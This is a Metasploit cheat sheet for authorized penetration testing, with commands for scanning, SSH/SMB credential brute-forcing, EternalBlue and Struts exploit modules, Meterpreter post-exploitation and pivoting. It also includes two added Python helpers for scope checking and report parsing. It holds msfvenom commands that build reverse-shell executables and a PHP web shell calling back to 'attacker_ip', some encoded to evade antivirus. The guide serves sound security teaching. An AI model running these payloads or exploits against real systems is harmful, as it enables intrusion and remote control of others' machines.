⚠️ IMPORTANT DISCLAIMER ⚠️
This cheat sheet is intended exclusively for authorized penetration testing, security research, and educational purposes. Only use Metasploit on systems you own or have explicit written permission to test. Unauthorized access to computer systems is illegal and unethical. Always follow responsible disclosure practices and comply with all applicable laws and regulations.
Getting Started
Installation and Setup
# Update Metasploit (Kali Linux)
sudo apt update && sudo apt install metasploit-framework
# Start PostgreSQL database
sudo systemctl start postgresql
# Initialize Metasploit database
sudo msfdb init
# Launch Metasploit console
msfconsole
Basic Console Commands
# Get help
help
?
# Update Metasploit
msfupdate
# Exit Metasploit
exit
quit
Core Commands and Navigation
Information and Search
# Show available modules
show exploits
show payloads
show auxiliary
show post
show encoders
show nops
# Search for modules
search <keyword>
search type:exploit platform:windows
search cve:2017-0144
# Get module information
info <module_name>
show options
show missing
show targets
show payloads
Module Selection and Usage
# Use a module
use <module_path>
use exploit/windows/smb/ms17_010_eternalblue
# Back out of current module
back
# Show current module options
show options
show advanced
show evasion
# Set module options
set RHOSTS 192.168.1.100
set RHOST 10.0.0.1
set LHOST 192.168.1.50
set LPORT 4444
set payload windows/meterpreter/reverse_tcp
# Unset options
unset RHOSTS
unset all
# Set global variables
setg RHOSTS 192.168.1.0/24
setg LHOST 192.168.1.50
Reconnaissance and Information Gathering
Port Scanning
# TCP port scan
use auxiliary/scanner/portscan/tcp
set RHOSTS 192.168.1.0/24
set PORTS 1-1000
run
# SYN scan
use auxiliary/scanner/portscan/syn
set RHOSTS target_ip
run
# Service version detection
use auxiliary/scanner/http/http_version
set RHOSTS 192.168.1.0/24
run
Service Enumeration
# SMB enumeration
use auxiliary/scanner/smb/smb_version
use auxiliary/scanner/smb/smb_enumshares
use auxiliary/scanner/smb/smb_enumusers
# HTTP enumeration
use auxiliary/scanner/http/http_version
use auxiliary/scanner/http/dir_scanner
use auxiliary/scanner/http/files_dir
# SSH enumeration
use auxiliary/scanner/ssh/ssh_version
use auxiliary/scanner/ssh/ssh_login
# FTP enumeration
use auxiliary/scanner/ftp/ftp_version
use auxiliary/scanner/ftp/anonymous
Database Integration
# Show database status
db_status
# Create workspace
workspace -a project_name
workspace project_name
# Import scan results
db_import nmap_scan.xml
# Show discovered hosts/services
hosts
services
vulns
# Search database
hosts -S windows
services -p 445
Vulnerability Assessment
Vulnerability Scanners
# SMB vulnerability scanner
use auxiliary/scanner/smb/smb_ms17_010
set RHOSTS 192.168.1.0/24
run
# Web application scanners
use auxiliary/scanner/http/ssl_version
use auxiliary/scanner/http/http_put
use auxiliary/scanner/http/backup_file
# Database scanners
use auxiliary/scanner/mysql/mysql_version
use auxiliary/scanner/mssql/mssql_ping
Credential Testing
# SSH login testing
use auxiliary/scanner/ssh/ssh_login
set RHOSTS target_ip
set USER_FILE /usr/share/wordlists/users.txt
set PASS_FILE /usr/share/wordlists/passwords.txt
run
# SMB login testing
use auxiliary/scanner/smb/smb_login
set RHOSTS target_ip
set SMBUser administrator
set SMBPass password123
run
# HTTP basic auth testing
use auxiliary/scanner/http/http_login
set RHOSTS target_ip
set AUTH_URI /admin
run
Payload Generation and Handling
MSFVenom (Payload Generator)
# List available payloads
msfvenom --list payloads
# Generate Windows reverse shell
msfvenom -p windows/meterpreter/reverse_tcp LHOST=attacker_ip LPORT=4444 -f exe > shell.exe
# Generate Linux reverse shell
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=attacker_ip LPORT=4444 -f elf > shell.elf
# Generate PHP web shell
msfvenom -p php/meterpreter/reverse_tcp LHOST=attacker_ip LPORT=4444 -f raw > shell.php
# Generate encoded payload
msfvenom -p windows/meterpreter/reverse_tcp LHOST=attacker_ip LPORT=4444 -e x86/shikata_ga_nai -i 3 -f exe > encoded_shell.exe
Multi/Handler
# Set up a listener for reverse shells; -j runs it as a background job,
# -z tells it not to interact with a session automatically when one opens
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST your_ip
set LPORT 4444
exploit -j -z
# Run the handler as a background job (pick up sessions later with `sessions -i`)
exploit -j
Post-Exploitation Fundamentals
Session Management
# List active sessions
sessions -l
# Interact with session
sessions -i 1
# Background current session
background
# Kill session
sessions -k 1
# Route traffic through session
route add 192.168.2.0/24 1
Basic Meterpreter Commands
# System information
sysinfo
getuid
getpid
# File system operations
pwd
ls
cd /path/to/directory
download file.txt
upload file.txt
# Process operations
ps
migrate <pid>
kill <pid>
# Network information
ifconfig
netstat
arp
Web Application Testing
HTTP Auxiliary Modules
# Directory enumeration
use auxiliary/scanner/http/dir_scanner
set RHOSTS target_ip
set DICTIONARY /usr/share/wordlists/dirb/common.txt
run
# HTTP methods testing
use auxiliary/scanner/http/http_put
set RHOSTS target_ip
run
# SSL/TLS testing
use auxiliary/scanner/http/ssl_version
set RHOSTS target_ip
run
Web Application Exploits
# Search for web application exploits
search webapp
search type:exploit platform:php
# Example: Apache Struts exploitation
use exploit/multi/http/struts2_content_type_ognl
set RHOSTS target_ip
set TARGETURI /vulnerable_app/
run
Best Practices for Penetration Testing
Documentation and Reporting
# Enable logging
spool /path/to/logfile.txt
# Take screenshots (Meterpreter)
screenshot
# Record the whole terminal session (Unix `script` utility, started before launching msfconsole)
script transcript.txt
# Export database findings
db_export -f xml report.xml
Evasion and Stealth
# List the evasion options a module supports (names are module-specific)
show evasion
# Set evasion/advanced options, e.g. the user agent of HTTP client modules and TCP chunking
set HttpUserAgent "Custom User Agent"
set TCP::max_send_size 1024
# Connection timeout and routing module traffic through a proxy
set ConnectTimeout 30
set Proxies socks4:127.0.0.1:9050
Resource Scripts
# Create resource script
echo "use exploit/multi/handler" > handler.rc
echo "set payload windows/meterpreter/reverse_tcp" >> handler.rc
echo "set LHOST 192.168.1.50" >> handler.rc
echo "exploit -j" >> handler.rc
# Run resource script
msfconsole -r handler.rc
resource handler.rc
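A scope check wrapped around resource-script generation, added here as an example; it is not code from the cheat sheet's author or from Metasploit. The Python script below builds a `portscan/tcp` resource script only for targets that fall entirely inside the authorized networks, so a typo in a target list cannot produce a scan outside the rules of engagement. `AUTHORIZED_SCOPE`, the workspace name and the target lists are constructed sample values.

```python
"""Build a Metasploit resource script only for targets inside the authorized scope.

Added example; not code from the cheat sheet's author or from Metasploit.
AUTHORIZED_SCOPE, the workspace name and the target list are constructed
sample values standing in for a real engagement's rules of engagement.
"""
import ipaddress

# Constructed sample scope: the networks the written authorization covers.
AUTHORIZED_SCOPE = ["192.168.1.0/24", "10.0.0.0/24"]


def in_scope(target, scope=AUTHORIZED_SCOPE):
    """True if target (single IP or CIDR) lies entirely inside one authorized network."""
    net = ipaddress.ip_network(target, strict=False)  # a bare IP becomes a /32 or /128
    for allowed in scope:
        allowed_net = ipaddress.ip_network(allowed)
        # subnet_of() only accepts the same address family, so compare versions first
        if net.version == allowed_net.version and net.subnet_of(allowed_net):
            return True
    return False


def scope_violations(targets, scope=AUTHORIZED_SCOPE):
    """Return the targets that are not covered by the authorized scope."""
    return [t for t in targets if not in_scope(t, scope)]


def build_scan_rc(workspace, targets, scope=AUTHORIZED_SCOPE, threads=10):
    """Return the text of a resource script that runs the TCP portscanner on targets.

    Raises ValueError before emitting anything if any target is out of scope.
    """
    bad = scope_violations(targets, scope)
    if bad:
        raise ValueError(f"refusing to build script: targets outside authorized scope: {bad}")
    lines = [
        f"workspace -a {workspace}",          # create the engagement workspace
        f"workspace {workspace}",             # and select it so results land there
        "use auxiliary/scanner/portscan/tcp",
        f"set RHOSTS {' '.join(targets)}",    # RHOSTS accepts a space-separated list
        f"set THREADS {threads}",
        "run",
        "back",
    ]
    return "\n".join(lines) + "\n"


def write_rc(path, workspace, targets, scope=AUTHORIZED_SCOPE):
    """Write the resource script to disk; run it with `msfconsole -r <path>`."""
    text = build_scan_rc(workspace, targets, scope)
    with open(path, "w", encoding="utf-8") as fh:
        fh.write(text)
    return path


if __name__ == "__main__":
    # Constructed target list: one in-scope network and one in-scope host.
    print(build_scan_rc("client_pentest_2024", ["192.168.1.0/24", "10.0.0.7"]))
    # An out-of-scope host is reported and build_scan_rc() would refuse it.
    print(scope_violations(["192.168.1.5", "203.0.113.9"]))  # -> ['203.0.113.9']
```

The generated file is an ordinary resource script, so it runs with `msfconsole -r scan.rc` or `resource scan.rc` exactly like the hand-written `handler.rc` above; the difference is that the scope check runs before a single line is written, which is where a mistake is cheapest to catch.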
Advanced Techniques
Pivoting and Tunneling
# Add route through compromised host
route add 10.0.0.0/24 session_id
# Set up SOCKS proxy
use auxiliary/server/socks_proxy
set SRVPORT 1080
run -j
# Port forwarding
portfwd add -l 8080 -p 80 -r target_ip
Custom Module Development
# Module locations
~/.msf4/modules/
/usr/share/metasploit-framework/modules/
# Reload modules
reload_all
reload_lib
# Test custom modules
check
Workspace Management
Project Organization
# Create and manage workspaces
workspace -a client_pentest_2024
workspace -l
workspace client_pentest_2024
# Import external scan data
db_import nessus_scan.nessus
db_import nmap_results.xml
# Export workspace data
db_export -f xml -a client_report.xml
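A reporting helper for the XML written by `db_export`, added here as an example; it is not part of the cheat sheet or of Metasploit. The element layout it expects (`hosts/host/address`, `services/service/port`, `vulns/vuln/refs/ref`, hyphenated names such as `os-name`) is an assumption about the export format, and `SAMPLE_EXPORT` is a constructed document in that shape rather than a real export; compare a real export against it before relying on the field names.

```python
"""Summarize a Metasploit `db_export -f xml` file for a report.

Added example; not code from the cheat sheet's author or from Metasploit.
ASSUMPTION: the export nests <hosts><host> with <address>, <name>, <os-name>,
<services><service> (port/proto/state/name/info) and <vulns><vuln><refs><ref>.
SAMPLE_EXPORT is a constructed document in that shape, not a real export.
"""
import xml.etree.ElementTree as ET
from collections import Counter

# Constructed sample export: two hosts, a few services, one vulnerability record.
SAMPLE_EXPORT = """<MetasploitV5>
  <hosts>
    <host>
      <address>192.168.1.10</address><name>fileserver</name><state>alive</state>
      <os-name>Windows Server 2012</os-name>
      <services>
        <service><port>445</port><proto>tcp</proto><state>open</state><name>smb</name><info>Windows Server 2012 R2</info></service>
        <service><port>3389</port><proto>tcp</proto><state>closed</state><name>rdp</name><info></info></service>
      </services>
      <vulns>
        <vuln><name>MS17-010 SMB RCE Detection</name><refs><ref>CVE-2017-0144</ref></refs></vuln>
      </vulns>
    </host>
    <host>
      <address>192.168.1.20</address><name>webapp</name><state>alive</state>
      <os-name>Linux</os-name>
      <services>
        <service><port>22</port><proto>tcp</proto><state>open</state><name>ssh</name><info>OpenSSH 8.2</info></service>
        <service><port>80</port><proto>tcp</proto><state>open</state><name>http</name><info>Apache</info></service>
      </services>
      <vulns/>
    </host>
  </hosts>
</MetasploitV5>
"""


def _text(elem, tag, default=""):
    """Text of a child element, or default when the child is missing or empty."""
    child = elem.find(tag)
    return default if child is None or child.text is None else child.text.strip()


def parse_export(xml_text):
    """Parse export XML into a list of host dicts carrying their services and vulns."""
    hosts = []
    for h in ET.fromstring(xml_text).iterfind("./hosts/host"):
        services = [{"port": int(_text(s, "port") or 0), "proto": _text(s, "proto"),
                     "state": _text(s, "state"), "name": _text(s, "name"),
                     "info": _text(s, "info")}
                    for s in h.iterfind("./services/service")]
        vulns = [{"name": _text(v, "name"),
                  "refs": [r.text.strip() for r in v.iterfind("./refs/ref") if r.text]}
                 for v in h.iterfind("./vulns/vuln")]
        hosts.append({"address": _text(h, "address"), "name": _text(h, "name"),
                      "os": _text(h, "os-name"), "services": services, "vulns": vulns})
    return hosts


def hosts_with_open_port(hosts, port, proto="tcp"):
    """Offline equivalent of `services -p <port>`: addresses with that port open."""
    return sorted(h["address"] for h in hosts
                  if any(s["port"] == port and s["proto"] == proto and s["state"] == "open"
                         for s in h["services"]))


def summarize(hosts):
    """Per-host count of open services and a tally of CVE references, for the report."""
    open_counts = {h["address"]: sum(1 for s in h["services"] if s["state"] == "open")
                   for h in hosts}
    cves = Counter(ref for h in hosts for v in h["vulns"] for ref in v["refs"]
                   if ref.startswith("CVE-"))
    return open_counts, cves


def render_report(hosts):
    """Plain-text findings listing: one line per open service plus vuln references."""
    lines = []
    for h in hosts:
        lines.append(f"{h['address']} ({h['name'] or 'unnamed'}, {h['os'] or 'unknown OS'})")
        for s in h["services"]:
            if s["state"] == "open":
                lines.append(f"  {s['port']}/{s['proto']} {s['name']} {s['info']}".rstrip())
        for v in h["vulns"]:
            lines.append(f"  VULN {v['name']} [{', '.join(v['refs'])}]")
    return "\n".join(lines)


if __name__ == "__main__":
    # Real use: parsed = parse_export(open("client_report.xml", encoding="utf-8").read())
    parsed = parse_export(SAMPLE_EXPORT)
    print(render_report(parsed))
    print(hosts_with_open_port(parsed, 445))  # -> ['192.168.1.10']
```

The stock `xml.etree` parser is fine for exports you generated yourself; for XML supplied by a third party (a client-provided Nessus or nmap file, for instance) parse it with `defusedxml` instead, since the standard parsers can be abused through entity expansion.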
Security Testing Scenarios
Internal Network Assessment
# 1. Network discovery
use auxiliary/scanner/discovery/arp_sweep
set RHOSTS 192.168.1.0/24
run
# 2. Service enumeration
use auxiliary/scanner/portscan/tcp
set RHOSTS 192.168.1.0/24
run
# 3. Vulnerability identification
use auxiliary/scanner/smb/smb_ms17_010
set RHOSTS 192.168.1.0/24
run
Wireless Security Testing
# Wireless auxiliary modules
search type:auxiliary wireless
use auxiliary/scanner/wireless/kismet_logging
Troubleshooting Common Issues
Connection Problems
# Check firewall settings
# Verify IP addressing
# Test connectivity with ping/telnet
# Debug payload connections
set Verbose true
set ExitOnSession false
Performance Optimization
# Set threading for scanners
set THREADS 20
# Check database connectivity (slow searches usually mean the database is not connected)
db_status
# Rebuild the module search cache (older Metasploit versions only; removed in Metasploit 5)
db_rebuild_cache
Legal and Ethical Guidelines
Authorization Requirements
- ✅ Written permission from system owner
- ✅ Clear scope of testing defined
- ✅ Rules of engagement established
- ✅ Emergency contact procedures
- ✅ Data handling agreements
Professional Standards
- Document all activities thoroughly
- Follow responsible disclosure timelines
- Maintain confidentiality of client data
- Provide clear, actionable recommendations
- Ensure minimal impact on production systems
Compliance Considerations
- PCI DSS penetration testing requirements
- HIPAA security assessments
- SOX compliance testing
- Industry-specific regulations
Conclusion
Metasploit is a powerful framework for authorized security testing when used responsibly. This cheat sheet provides essential commands and workflows for legitimate penetration testing activities. Remember that effective penetration testing requires not just technical skills, but also strong ethical standards and thorough documentation practices.
Key Reminders:
- Always obtain proper authorization before testing
- Document everything for client reports
- Follow coordinated vulnerability disclosure
- Stay updated with latest security research
- Continuous learning is essential in cybersecurity
Additional Resources:
- Official Metasploit Documentation
- Penetration Testing Execution Standard (PTES)
- OWASP Testing Guide
- NIST Cybersecurity Framework
- Offensive Security Training Materials
Use this knowledge responsibly to improve cybersecurity defenses.